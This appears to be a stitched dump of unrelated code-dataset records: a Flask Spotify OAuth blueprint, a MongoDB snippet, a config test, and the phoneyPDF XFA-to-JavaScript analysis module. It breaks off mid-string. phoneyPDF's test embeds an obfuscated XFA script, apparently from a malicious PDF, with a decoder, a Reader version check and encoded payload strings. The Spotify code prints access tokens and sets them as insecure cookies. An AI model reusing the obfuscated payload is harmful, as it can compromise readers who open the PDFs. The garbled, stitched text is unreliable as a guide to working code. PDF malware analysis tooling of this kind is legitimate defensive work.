"step-5": "import os\nimport base64\nfrom urllib.parse import urlencode\nimport json\n\nfrom flask import Blueprint, request, redirect, jsonify, make_response\nimport requests\n\nspotify = Blueprint('spotify', __name__)\n\n# Client Keys\nSPOTIFY_CLIENT_ID = os.environ.get('SPOTIFY_CLIENT_ID')\nSPOTIFY_CLIENT_SECRET = os.environ.get('SPOTIFY_CLIENT_SECRET')\n\n# Spotify URLS\nSPOTIFY_AUTH_URL = \"https://accounts.spotify.com/authorize\"\nSPOTIFY_TOKEN_URL = \"https://accounts.spotify.com/api/token\"\nSPOTIFY_API_BASE_URL = \"https://api.spotify.com\"\nAPI_VERSION = \"v1\"\nSPOTIFY_API_URL = \"{}/{}\".format(SPOTIFY_API_BASE_URL, API_VERSION)\n\n# Server-side Parameters\nCLIENT_SIDE_URL = \"http://localhost\"\nPORT = 8888\nREDIRECT_URI = \"{}:{}/callback\".format(CLIENT_SIDE_URL, PORT)\nSCOPE = \"playlist-modify-public playlist-modify-private user-read-currently-playing\"\nSTATE = \"\"\nSHOW_DIALOG_BOOL = True\nSHOW_DIALOG_STR = str(SHOW_DIALOG_BOOL).lower()\n\n\nauth_query_parameters = {\n \"response_type\": \"code\",\n \"redirect_uri\": REDIRECT_URI,\n \"scope\": SCOPE,\n # \"state\": STATE,\n # \"show_dialog\": SHOW_DIALOG_str,\n \"client_id\": SPOTIFY_CLIENT_ID\n}\n\n\[email protected](\"/login\")\ndef login():\n # Auth Step 1: Authorization\n url_args = urlencode(auth_query_parameters)\n print(url_args)\n auth_url = \"{}/?{}\".format(SPOTIFY_AUTH_URL, url_args)\n return redirect(auth_url)\n\n\[email protected](\"/callback\")\ndef callback():\n # Auth Step 4: Requests refresh and access tokens\n auth_code = request.args['code']\n code_payload = {\n \"grant_type\": \"authorization_code\",\n \"code\": str(auth_code),\n \"redirect_uri\": REDIRECT_URI\n }\n\n base64encoded = base64.b64encode(bytes(\"{}:{}\".format(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {\"Authorization\": \"Basic {}\".format(base64encoded.decode('utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload, headers=headers)\n\n # Auth Step 5: Tokens are Returned to Application\n response_data = json.loads(post_request.text)\n access_token = response_data[\"access_token\"]\n print(access_token)\n refresh_token = response_data[\"refresh_token\"]\n token_type = response_data[\"token_type\"]\n expires_in = response_data[\"expires_in\"]\n\n redirect_to_index = redirect(\"http://localhost:3000/\")\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected](\"/refresh_token\", methods=['POST'])\ndef refresh_token():\n # 7. Requesting access token from refresh token\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token\n }\n base64encoded = base64.b64encode(bytes(\"{}:{}\".format(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {\"Authorization\": \"Basic {}\".format(base64encoded.decode('utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload, headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import pymongo
myclient = pymongo.MongoClient('mongodb://localhost:27017/') #Create the MongoDB client object
mydb = myclient['mydatabase'] #Create a database
mycol = mydb['customers'] #Create a collection in mydatabase
mydict = [{"name": "Eric", "address": "Highway 37"}, {"name": "Albert", "address": "Highway 37"}, {"name": "Ivan", "address": "Highway 37"}]
x = mycol.insert_many(mydict)
myquery = {'name':'Albert'}
mydoc = mycol.find()
print(mydoc)
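
# Note: myquery is defined above but never passed to find(); a filtered query
# and readable output would look like this (standard pymongo API):
#
#   for doc in mycol.find(myquery):
#       print(doc)   # only documents whose name is 'Albert'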
|
normal
|
{
"blob_id": "6c6026a7ff0345c37e62de7c0aac0ee3bcde2c82",
"index": 5879,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(mydoc)\n",
"step-3": "<mask token>\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['mydatabase']\nmycol = mydb['customers']\nmydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',\n 'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]\nx = mycol.insert_many(mydict)\nmyquery = {'name': 'Albert'}\nmydoc = mycol.find()\nprint(mydoc)\n",
"step-4": "import pymongo\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['mydatabase']\nmycol = mydb['customers']\nmydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',\n 'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]\nx = mycol.insert_many(mydict)\nmyquery = {'name': 'Albert'}\nmydoc = mycol.find()\nprint(mydoc)\n",
"step-5": "import pymongo\n\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/') #We create the database object\n\nmydb = myclient['mydatabase'] #Create a database\n\nmycol = mydb['customers'] #Create a collection into my mydatabase\n\nmydict = [{\"name\": \"Eric\", \"address\": \"Highway 37\"}, {\"name\": \"Albert\", \"address\": \"Highway 37\"}, {\"name\": \"Ivan\", \"address\": \"Highway 37\"}]\n\nx = mycol.insert_many(mydict)\n\nmyquery = {'name':'Albert'}\n\nmydoc = mycol.find()\n\nprint(mydoc)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from src.config import Config
mock = {
"entities": {
"foo": [ "bar", "foobar" ]
},
"synonimous": {
"fizz": [ "fizzfuzz", "fuzz"]
},
"templates": [
{
"text": "{synonimous.fizz} and {entities.foo}",
"intention": "fizzfoo"
}
]
}
def test_should_config_start_correctly():
c = Config(mock)
assert c._entities == mock['entities']
assert c._synonimous == mock['synonimous']
assert c.templates == mock['templates']
assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']
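
# For reference, a minimal Config that would satisfy these assertions might look
# like the sketch below; the real src.config implementation may well differ.
#
#   class Config:
#       def __init__(self, data):
#           self._entities = data['entities']
#           self._synonimous = data['synonimous']
#           self.templates = data['templates']
#
#       def get_value(self, group, key):
#           return getattr(self, '_' + group)[key]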
|
normal
|
{
"blob_id": "987f8ce668f2002b731822fa5f3de143a80aaafe",
"index": 9807,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_should_config_start_correctly():\n c = Config(mock)\n assert c._entities == mock['entities']\n assert c._synonimous == mock['synonimous']\n assert c.templates == mock['templates']\n assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']\n",
"step-3": "<mask token>\nmock = {'entities': {'foo': ['bar', 'foobar']}, 'synonimous': {'fizz': [\n 'fizzfuzz', 'fuzz']}, 'templates': [{'text':\n '{synonimous.fizz} and {entities.foo}', 'intention': 'fizzfoo'}]}\n\n\ndef test_should_config_start_correctly():\n c = Config(mock)\n assert c._entities == mock['entities']\n assert c._synonimous == mock['synonimous']\n assert c.templates == mock['templates']\n assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']\n",
"step-4": "from src.config import Config\nmock = {'entities': {'foo': ['bar', 'foobar']}, 'synonimous': {'fizz': [\n 'fizzfuzz', 'fuzz']}, 'templates': [{'text':\n '{synonimous.fizz} and {entities.foo}', 'intention': 'fizzfoo'}]}\n\n\ndef test_should_config_start_correctly():\n c = Config(mock)\n assert c._entities == mock['entities']\n assert c._synonimous == mock['synonimous']\n assert c.templates == mock['templates']\n assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']\n",
"step-5": "from src.config import Config\n\nmock = {\n \"entities\": {\n \"foo\": [ \"bar\", \"foobar\" ]\n },\n \"synonimous\": {\n \"fizz\": [ \"fizzfuzz\", \"fuzz\"]\n },\n \"templates\": [\n {\n \"text\": \"{synonimous.fizz} and {entities.foo}\",\n \"intention\": \"fizzfoo\"\n }\n ]\n}\n\ndef test_should_config_start_correctly():\n c = Config(mock)\n\n assert c._entities == mock['entities']\n assert c._synonimous == mock['synonimous']\n assert c.templates == mock['templates']\n\n assert c.get_value('synonimous', 'fizz') == mock['synonimous']['fizz']",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''
XFA/XDP DOM in Javascript
This file is part of the phoneyPDF Framework
This module provides methods for transforming both PDF objects and XML (xfa/xdp) into a single structure of linked objects
in javascript. The idea is that any *DOM interation will play out in javascript land, where the DOMs are created and
maintained as the PDF is 'rendered'.
Trevor Tonn <[email protected]>
Copyright (c) 2013, VERISIGN, Inc
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of VERISIGN nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from lxml import etree
DEBUG = True
def removeNamespace(element, logger):
'''
Removes the namespace stuff from an element's tag attr. Probably a bad idea.
'''
if not element.nsmap:
logger.info("empty nsmap")
return
for key in element.nsmap:
val = element.nsmap[key]
s = "{%s}" % val
logger.debug("removing %s => %s: %s" % (key, val, s))
element.tag = element.tag.replace(s, "")
def elementToJS(element, jsStrL, logger):
logger.debug("converting element '%s'" % element.tag)
origTag = element.tag
removeNamespace(element, logger)
if origTag != element.tag:
logger.debug(" -- tag had namespace removed; new tag: %s" % element.tag)
# add element first
jsStrL.append("%s = new Element('%s');" % (element.tag, element.tag))
# see if there's any text
if element.text:
# we will likely need to escape chars like ' and " to make this work...
jsStrL.append("%s.text = \"%s\";" % (element.tag, element.text.strip()))
# add children both by their tagname and as integers
index = 0
for childElement in element.getchildren():
# create child recursively
elementToJS(childElement, jsStrL, logger)
if element.tag == 'subform':
#TODO: process subform for field names
pass
# now, add this child both as a property and something accessible via index
jsStrL.append("%s.%s = %s;" % (element.tag, childElement.tag, childElement.tag))
jsStrL.append("%s[%d] = %s;" % (element.tag, index, childElement.tag))
index += 1
def xmlToJS(xml, logger):
'''
Takes an LXML element tree and converts it into javascript code that, when executed by
a javascript engine, will create a very similar structure that can be manipulated in
javascript land by other scripts.
Returns a string of javascript suitable for eval()'ing.
'''
# Prepare the javascript string with a defintion of our 'Element' object
jsStrL = ["""
function Element(tag) {
this.tag = tag;
// this needs a lot more stuff added to it...
}
"""]
# Convert XML elements into a tree of javascript objects
try:
elementToJS(xml, jsStrL, logger)
except Exception,e:
logger.warn(e)
pass
return '\n'.join(jsStrL)
def getExposedObjects():
'''
Adobe Reader has all sorts of objects that are defined under the hood and exposed to javascript.
This method returns a string of javascript which contains definitions for those objects.
'''
defsStr = """
var app = Object();
"""
return defsStr
def test_xmlToJS():
#x="""<xfa><subform><g><script>var q='hector'; var p='go'; var f=function(a,b){ return a+' '+b; };</script></g></subform><subform2><ggg><script language="javascript">print( f(p,q) );</script></ggg></subform2></xfa>"""
y="""<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/"><subform layout="tb" locale="en_US" name="kos"><pageSet><pageArea id="rya" name="rya"><contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/><medium long="792pt" short="612pt" stock="default"/></pageArea></pageSet><subform h="756pt" w="576pt" name="upo"><field h="65mm" name="sac" w="85mm" x="53.6501mm" y="88.6499mm"><event activity="initialize" name="cum"><script contentType="application/x-javascript">
abo=kor([app]);kop();function led(y,s){var v,p,g,f,m,o,a,z,x,h,b,f,w,l;a=sac.rawValue.replace(/[QjCGRkhPK]/g,'');o='';z='';h=0;v='substr';m=y.length;l='fromCh';l+='arCode';g=String;for(w=0;w<m;w++){h+=s;f=y[v](w,1);b=a.indexOf(f);b+=h;b%=a.length;o+=a[v](b,1)}for(x=0;x<m;x+=2){f=o[v](x,2);p=parseInt(f,16);z+=g[l](p)}return z}function kor(g){return g[0]}function red(){var f,b,i,a,c,m,g,k,z,w,u,t,y;m='ib94oe0z7aY9e2';c=2;w=led(m,c);z='z8I7i6o6z6aa';t=29;i=led(z,t);b='X8aWSSz53389eYiiba2fdIza61';g=23;a=led(b,g);f='fdYcYel5bi0aII45';k=24;y=led(f,k);u=abo[a][y]();u=u[w]('.','');while(u[i]<4){u+='0'}u=parseInt(u,10);return u}function kop(){var u,j,kw,z,w,v,kr,o,x,n,ky,r,c,s,m,kc,b,ka,km,f,p,l,q,kp,a,d,kk,h,kv,y,kb,ku,t,i,ks,k,kt,g;r='8eWd2d3f1bXed868f5bae07o4i5IazaSoii2IYz0892W27Y7019XWlS63f1bXed164f5bael7o705SaSl8ocidIYz089cW28Y3019XWdS9Yl1IXId764f2bael7o4i57azl8oci2I6808bce2SY3059XWdS63f1XXed764f5bib2794W5Iazl1oci2IYz0z6c22SY301WaWdSo3o1bX4XI64f5baea4l455Iazl8oci2IYz089cW2SYX049Xco4754a5laol';k=21;u=led(r,k);m=11146;m-=2945;y=2815;y-=815;v='133S2eiX';w=24;s=led(v,w);p='58lfo01Si5Y7e826bzc14d064SlX7SYW8460z7dYIez96Xzid1IoXcil1Soa3Wl5S9a4W0579Y4e024bYcef28b6czfd8I6Xze6259X3Ia0Yo61fe1SbboSza6od430Sd5fWbi28edo1fdl9S4a2X1izdei718oz1iooWca4SYf6Wz4e027bYcef28b6czfd8I6Xzid1IoX3il1Soa3WldSIl4Sf5a9o5e9d74Ya7fY8eo2e358Sd9ai655I96ia17oYzzld305XWfaa8X5zzW74Y0Wo25b42Wff75da84d2IbXb42X7laSilo3calW151Wo6z024fI377i81l2abdcIf585d6Ic1SIfXbo619e83bl3cd580Y3I9c4IIWbf21bo44f0cidYzW665Yd44z1XoizbldSXa4W84aoW73Y57SYSXlY1f68efbca6fz2d2zb94ilXW781ia52o0oi6a7Wd5d097a287WYSb92I35cSfca0d5ib1cia0zWzzel2SbXXWiae0o4z99do0XX42Ybe4Sf08YY5ziddIoX3if18o8Yfo2W953WSa69W4l0l4SIXefYzfecY3Y7cd4a261z0d0iI16l51zo8SIl7cda8Wa6i0deSI9W0iYz7dYfl8SYYze63ibX4II0biYYXloS3X8Wi5oeS3z0c4bIWeW25b5oWbll26fz824IbXfi81Soa3Wl5SdaaSYfI966a0c74a1eW29';b=27;c=led(p,b);t='o6207oY2S14dWf6I';a=10;j=led(t,a);i=4132;i+=3868;d='c413iIeoaI76acY3823IX6976ce9Iic6bb44llIIcc5SiY8WY1W61365eo5zo2z9239d3bd4bl4Ilcz0cS0XSfX7fa7ia8iYzc07W71ef4X45zo6acif0d1odfe747lW51c8beSfde307ol84a8e22S33XYceb5076a9c49d1fWfe74IlcI0cS0XSfX7fa7ia8iY8WY1W61e65eo5zo2zI2cWd1Idlbf5IoXISc89X2fda30d0a1oIlW05cb0a64eI1Wi1z9YS0X3f2X125Sac5o2Yl5SWXobc7zXlo6ccY4W78eS8e944o2Ifi69b3aX6e242lczYob9f2f9zbb4i5Xodc2Y2W43i6XXo54icI9Yd8oYodcfl3Wo8zfo6YXSecIbc7ilzo289a2caXzd5Xfal6XzI2f9d3XXl9I77adI34Sz4Si11fae9b0iW8d20Sa1a657lf9i5I9izeeziX2fY5alaI18b022fX1b5eilY4flfY5993364XfY06dzS5eW53b67fa4ida5d27YX29d6027ea9fd8WYdW61e6ce81z71zbcc9dSiWobI4Yaozdcd0X361afIdbXYoXld2a9lXd6dec4Woaa92cWXSb6l1969lXiiodlc27llII7zXSIX8W039d1bYdXYa3l2aiY0oa3Sdizz3Sl8z0o605S4c73c7W584lc2a4W91l6Ieo5zo2z92z94Y4Wzb07Ieiz84e0YS5';h=13;x=led(d,h);o='5f944c0bl2Yi';q=27;n=led(o,q);f='fIYI61Wai16Sio6dSai16IYb';l=15;g=led(f,l);z='6a6f696e';kr=25;kk=led(z,kr);ku=15820;ku-=6519;km=red();if(km>=i){ky='';kv=g;kw=pub(s,y);ks=21;kp='of922ozi89Xed564f5bebaS74S5ab9dzi04WIY11coo6YSYeY295SdS4Sf3IXS2adzII10X8c82cY20YoYoi4Xbazlzbcd57YSY78bW7Wdz1XXX8deSz65b2b9dz6z4SXle1lci5i6aXz6c72WIeY28WW436Y51aXbW56164boedS7621W5zl1oiic5XIzlcceYS25039YidW9Y181XeWI6if41oel7I555I54d86aodIfeY808fidYfzeWWcl3e360ocWdo673lbael4z34fia2eXlcfXI3zYl68ciW0zz59e77SdSl05Xl66So3ibeeadY74a3lee1odflI2Idl1cdi4azY0eeWXS7303bddWSY7f5be724065fI5WeSoWic59zbzIo25Y0Y06W49lS4Yf1fXeWl6i0b12Xzez35aIbYl9o84W51I88fciYY0Sl40XWlS0360o9a2e673b1Ie87l6YfiaWoS7Xia5WzYl6oX26I5l8097eSe341o1I6IScfIbdeadY6c5Yb1d7loSWIXz6z3cdi8I6069eWl27371adXWcSl62b5eld842fc5Sl37441zWei8fdXYbY7l1Wa9oWe358X15W6Si3zei727c4zf95a99o1i6ifablb81YIa3l9WfiWIaS107XI27fcIi16WYdb42aba9o370I2iazYle89260d979eW7Sd3f05Xl6Ifl041eWY4o6c5YaI
e2o5fXbI8l73o65e27Y792WX2aS30X9lW5flfob8Wleb655W5WeSoWic59z08X22Y207l1oYceSe551W9i2zYz0be2bI7c354Ibzl0li43bdzXzc4iY7Yz03ociX2Y5405dXX6dff592e84639a552ooo0fdzdz87o27cSIzl3WW9lS4Y981ciX6dl3l1c7I44691aaWe2oaiW5a80z64f520e098595Sd370acIWlY3fXb5X2e765f952oz6Xi5IWIilc81ib2S0b91cYI6Y6Xod5W3f2b8eiX64W50fcl290oco9zaa0l64c5e2406869bSlS11bcIdof30cebbI4449a3lSlo64I65dal7022c7Y7zc05caS7z03SczWl6lb8bieY4Y4e1Slle2iciS5YIdz8o2i7Y3Y0ebWX273a3iX3XaflIibaXz4z4Y59bcl4l34cIf13zb4biY030c91c5WSY18bcdd6Si0b1dbfd458495Il9o84ab2e07IoXifY60282S2SlS11bcIdoff3195el7450aWbll5ococI3zYlSc7i72e0bW4c03aSi1Xcbdedz3ibz777974faaIe779iSI2aW89cIYYY3Y2oXi0WdY9049iooYf3bzIbld45e5200l47iic5Xa38X22i1f6zcWYSdI3Yf8i9W2d61f41cXzSY701I5Se56iI5baa07c2i5IYel9Wci2Sd1la5dWW7dz011ce27l6bYYaSdS6aiabdezco41ifa7Y2WWW7SdYl319dWz6cf4b0Wa4z7efaXSo879iSI2aW89cdYYI0l89eS536Sf19X3W6Yz051ib24W6e1aled7o8fI5dIi8f822SY00bWcia3SS70Xll6667f4baXz7c6if352o5ii43b2al8929cXI0za84ceS436311WW66X359b70493i43bla1oc4WI3zYl1ob2Ia0zc05c5S6Ye1ice26S86516WI4Y3Wfal3lSi1IlbI8Szeo2i6Y3zf9eWX27Yo19cWWlSc049XbIdz3i1al2a37iic5Xad8Xc9iza3z79a7e3e548X156SS43lzzX8ez554ib3lS7049idaY7fo65IYf038490I61304dWW76X3dfcea4o3e5aXSe3oco1iY8l81c7idYSz78bW73a54XIcd26S865b6e0dI45fW5Wlzo04Sbdal78cd2WIeY08Wi23iz68fX36adX3be2eld8425i52oYW9fIiW8ll9of5S00Y59fcfWe3o3XdiWlYz6b1oWI7b50f35zl5i3i25Yzic6cz5XYcz591WSIaz1Xi15dod63Ife7ee46Y1WaelW7YoXbozY8022cS20l8WaW2Sdz08f9W2zf8fo96e6d43857lIl5lcilIXzlX12zibaYl40aWb2bS71XXIWId6651c72447W5ebYlYioi35SzSlbcb5WY00co5WSSe3f1I9adaf4fI1cbId638aWX3l373IXbWzi80ddYSael9W59bS4z13b9edldf3z92ece43faSaelz64fc5a13lec158Y8z99l7eIezo14ded3Sz6o1XXf744W59lzooo0I2IWadz3oiib03l69YWX44351idIW6Y8b81aWddY4o5ibclX75I6IYa38X22ifa0l4Wlcf2eY01f9S2ISff4eaXz7c4ofea9o3liI1I3zfcIcWYeIX998ciXS631XodIW6fzbfeXWlS45847bleXioI5bYe8l32icS00zeoa772oYI1b9Sdcf33110797Y481Sa1lS75o1Ifzdli8c2407z88ccb2iY907dX2eYf68b07Y4922f7X4dolaIiIdez762c58a0zf8Yi0IlSI0bXi2zYzbff0baSY6ef3bYdYiofli2eS81o7c22d0f8liaIe341i9a2zf66Yf58zdb7S1bX2l07dfXbW8zcf8cc8Y6zao5ib3S3o8X1X6dd23IzI7e406c1SaYe2l3f9zI86z88e2dI5l40cWeWi3i8IXbWISofI';kb=led(kp,ks);kc=pub(s,7600);if(km<m){ky=c}else if(km<ku){ky=x}if(ky[n]){kt=u;ka=[kv,kw,kb,kc,kt,ky][kk]('');sac[j]=ka}}return}function pub(j,u){var a,r,w,g,q,y;y='967e2IfXYiX7';w=6;g=led(y,w);a='WfdY64oYc4WSSe694d';q=30;r=led(a,q);while(j[g]<u){j+=j}j=j[r](0,u);return j}</script></event><ui><imageEdit/></ui></field></subform></subform></template>"""
xml=etree.fromstring(y)
jsStr = xmlToJS(xml)
print jsStr
if __name__ == "__main__":
test_xmlToJS()
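
# Usage sketch outside the test above (note that xmlToJS() takes a logger
# argument which test_xmlToJS() does not pass; names below are illustrative):
#
#   import logging
#   logger = logging.getLogger("phoneypdf.xfadom")
#   xml = etree.fromstring("<xfa><subform><script>var a = 1;</script></subform></xfa>")
#   js = getExposedObjects() + xmlToJS(xml, logger)
#   # 'js' is a string of javascript suitable for handing to a JS engine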
|
normal
|
{
"blob_id": "59b2d0ff3296c9d9a76b8b69a784d5a0c46128be",
"index": 8080,
"step-1": "'''\nXFA/XDP DOM in Javascript\nThis file is part of the phoneyPDF Framework\n\nThis module provides methods for transforming both PDF objects and XML (xfa/xdp) into a single structure of linked objects\nin javascript. The idea is that any *DOM interation will play out in javascript land, where the DOMs are created and\nmaintained as the PDF is 'rendered'.\n\nTrevor Tonn <[email protected]>\n\nCopyright (c) 2013, VERISIGN, Inc\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n * Neither the name of VERISIGN nor the names of its contributors\n may be used to endorse or promote products derived from this software\n without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\nA PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\nPROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\nNEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n'''\n\nfrom lxml import etree\nDEBUG = True\n\ndef removeNamespace(element, logger):\n '''\n Removes the namespace stuff from an element's tag attr. 
Probably a bad idea.\n '''\n if not element.nsmap:\n logger.info(\"empty nsmap\")\n return\n\n for key in element.nsmap:\n val = element.nsmap[key]\n s = \"{%s}\" % val\n logger.debug(\"removing %s => %s: %s\" % (key, val, s))\n element.tag = element.tag.replace(s, \"\")\n\ndef elementToJS(element, jsStrL, logger):\n logger.debug(\"converting element '%s'\" % element.tag)\n origTag = element.tag\n removeNamespace(element, logger)\n if origTag != element.tag:\n logger.debug(\" -- tag had namespace removed; new tag: %s\" % element.tag)\n\n # add element first\n jsStrL.append(\"%s = new Element('%s');\" % (element.tag, element.tag))\n\n # see if there's any text\n if element.text:\n # we will likely need to escape chars like ' and \" to make this work...\n jsStrL.append(\"%s.text = \\\"%s\\\";\" % (element.tag, element.text.strip()))\n\n # add children both by their tagname and as integers\n index = 0\n for childElement in element.getchildren():\n # create child recursively\n elementToJS(childElement, jsStrL, logger)\n\n if element.tag == 'subform':\n #TODO: process subform for field names\n pass\n # now, add this child both as a property and something accessible via index\n jsStrL.append(\"%s.%s = %s;\" % (element.tag, childElement.tag, childElement.tag))\n jsStrL.append(\"%s[%d] = %s;\" % (element.tag, index, childElement.tag))\n index += 1\ndef xmlToJS(xml, logger):\n '''\n Takes an LXML element tree and converts it into javascript code that, when executed by\n a javascript engine, will create a very similar structure that can be manipulated in\n javascript land by other scripts.\n\n Returns a string of javascript suitable for eval()'ing.\n '''\n # Prepare the javascript string with a defintion of our 'Element' object\n jsStrL = [\"\"\"\n function Element(tag) {\n this.tag = tag;\n // this needs a lot more stuff added to it...\n }\n\n \"\"\"]\n\n # Convert XML elements into a tree of javascript objects\n try:\n elementToJS(xml, jsStrL, logger)\n except Exception,e:\n logger.warn(e)\n pass\n return '\\n'.join(jsStrL)\n\ndef getExposedObjects():\n '''\n Adobe Reader has all sorts of objects that are defined under the hood and exposed to javascript.\n This method returns a string of javascript which contains definitions for those objects.\n '''\n defsStr = \"\"\"\nvar app = Object();\n\"\"\"\n\n return defsStr\n\ndef test_xmlToJS():\n #x=\"\"\"<xfa><subform><g><script>var q='hector'; var p='go'; var f=function(a,b){ return a+' '+b; };</script></g></subform><subform2><ggg><script language=\"javascript\">print( f(p,q) );</script></ggg></subform2></xfa>\"\"\"\n y=\"\"\"<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.5/\"><subform layout=\"tb\" locale=\"en_US\" name=\"kos\"><pageSet><pageArea id=\"rya\" name=\"rya\"><contentArea h=\"756pt\" w=\"576pt\" x=\"0.25in\" y=\"0.25in\"/><medium long=\"792pt\" short=\"612pt\" stock=\"default\"/></pageArea></pageSet><subform h=\"756pt\" w=\"576pt\" name=\"upo\"><field h=\"65mm\" name=\"sac\" w=\"85mm\" x=\"53.6501mm\" y=\"88.6499mm\"><event activity=\"initialize\" name=\"cum\"><script contentType=\"application/x-javascript\">\nabo=kor([app]);kop();function led(y,s){var v,p,g,f,m,o,a,z,x,h,b,f,w,l;a=sac.rawValue.replace(/[QjCGRkhPK]/g,'');o='';z='';h=0;v='substr';m=y.length;l='fromCh';l+='arCode';g=String;for(w=0;w<m;w++){h+=s;f=y[v](w,1);b=a.indexOf(f);b+=h;b%=a.length;o+=a[v](b,1)}for(x=0;x<m;x+=2){f=o[v](x,2);p=parseInt(f,16);z+=g[l](p)}return z}function kor(g){return g[0]}function red(){var 
f,b,i,a,c,m,g,k,z,w,u,t,y;m='ib94oe0z7aY9e2';c=2;w=led(m,c);z='z8I7i6o6z6aa';t=29;i=led(z,t);b='X8aWSSz53389eYiiba2fdIza61';g=23;a=led(b,g);f='fdYcYel5bi0aII45';k=24;y=led(f,k);u=abo[a][y]();u=u[w]('.','');while(u[i]<4){u+='0'}u=parseInt(u,10);return u}function kop(){var u,j,kw,z,w,v,kr,o,x,n,ky,r,c,s,m,kc,b,ka,km,f,p,l,q,kp,a,d,kk,h,kv,y,kb,ku,t,i,ks,k,kt,g;r='8eWd2d3f1bXed868f5bae07o4i5IazaSoii2IYz0892W27Y7019XWlS63f1bXed164f5bael7o705SaSl8ocidIYz089cW28Y3019XWdS9Yl1IXId764f2bael7o4i57azl8oci2I6808bce2SY3059XWdS63f1XXed764f5bib2794W5Iazl1oci2IYz0z6c22SY301WaWdSo3o1bX4XI64f5baea4l455Iazl8oci2IYz089cW2SYX049Xco4754a5laol';k=21;u=led(r,k);m=11146;m-=2945;y=2815;y-=815;v='133S2eiX';w=24;s=led(v,w);p='58lfo01Si5Y7e826bzc14d064SlX7SYW8460z7dYIez96Xzid1IoXcil1Soa3Wl5S9a4W0579Y4e024bYcef28b6czfd8I6Xze6259X3Ia0Yo61fe1SbboSza6od430Sd5fWbi28edo1fdl9S4a2X1izdei718oz1iooWca4SYf6Wz4e027bYcef28b6czfd8I6Xzid1IoX3il1Soa3WldSIl4Sf5a9o5e9d74Ya7fY8eo2e358Sd9ai655I96ia17oYzzld305XWfaa8X5zzW74Y0Wo25b42Wff75da84d2IbXb42X7laSilo3calW151Wo6z024fI377i81l2abdcIf585d6Ic1SIfXbo619e83bl3cd580Y3I9c4IIWbf21bo44f0cidYzW665Yd44z1Xoi